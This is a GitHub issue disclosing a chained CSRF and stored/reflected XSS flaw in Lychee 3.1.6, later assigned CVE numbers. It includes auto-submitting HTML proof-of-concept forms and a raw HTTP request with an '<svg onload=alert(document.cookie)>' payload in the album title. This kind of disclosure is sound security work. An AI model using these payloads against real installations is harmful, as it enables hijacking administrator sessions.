search

Hebing123 / cve

0 stars 0 forks source link

electerious/Lychee 3.1.6 has CSRF vulnerability and reflective XSS vulnerability #17

Open Hebing123 opened 9 months ago

Hebing123 commented 9 months ago

Summary

This report contains the CSRF and XSS vulnerabilities found in electerious' Lychee. And there is a relationship between them. First, an attacker can trick an administrator into opening a link to create an album containing the title of the malicious code by constructing a form form, and implement the XSS effect by accessing the get interface.

Details

Lychee is an open source project on GitHub. The CSRF vulnerability exists when Albums are created without proper request validation, and an attacker can trick a user (administrator) into opening a link containing a malicious form to create a new album. The title of the album has an XSS vulnerability, so the code is executed when the administrator accesses the page generated by the get interface.

Proof of Concept (POC)

CSRF POC

<html>
  <body>
    <form action="http://ip:port/php/index.php" method="POST">
      <input type="hidden" name="function" value="Album::add" />
      <input type="hidden" name="title" value="csrftest" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

The attacker to save the POC HTML file as https://www.attack.com/csrftest.html, logged-in users (administrator) will open the page to create a new album called csrftest.

XSS POC

POST /php/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
x-requested-with: XMLHttpRequest
Cookie: PHPSESSID=ok2ogk1nj31cp0s1s1sbnab703
Content-Length: 75
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: ip:port

function=Album%3A%3Aadd&title=csrftest<svg%20onload=alert(document.cookie)>

image

The combined exploitation chain of these two vulnerabilities

<html>
  <body>
    <form action="http://192.168.160.147/php/index.php" method="POST">
      <input type="hidden" name="function" value="Album::add" />
      <input type="hidden" name="title" value="csrftest&lt;svg&#32;onload&#61;alert&#40;document&#46;cookie&#41;&gt;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

The attacker will POC in https://www.attack.com/1.html, the logged in user (administrator) will be sent to you by Albums: : Add function to create a new album title contain malicious code. image

<html>
  <body>
    <form action="http://192.168.160.147/php/index.php" method="POST">
      <input type="hidden" name="function" value="Albums&#58;&#58;get" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

The attacker put the POC in https://www.attack.com/2.html, logged-in users (administrator) to trigger an XSS vulnerability through access to Albums::get function. image

Impact

The attacker can exploit the CSRF vulnerability to trick administrators into creating Albums with titles that contain malicious code, resulting in an XSS vulnerability.

Hebing123 commented 6 months ago

CVE-2024-25807 CVE-2024-25808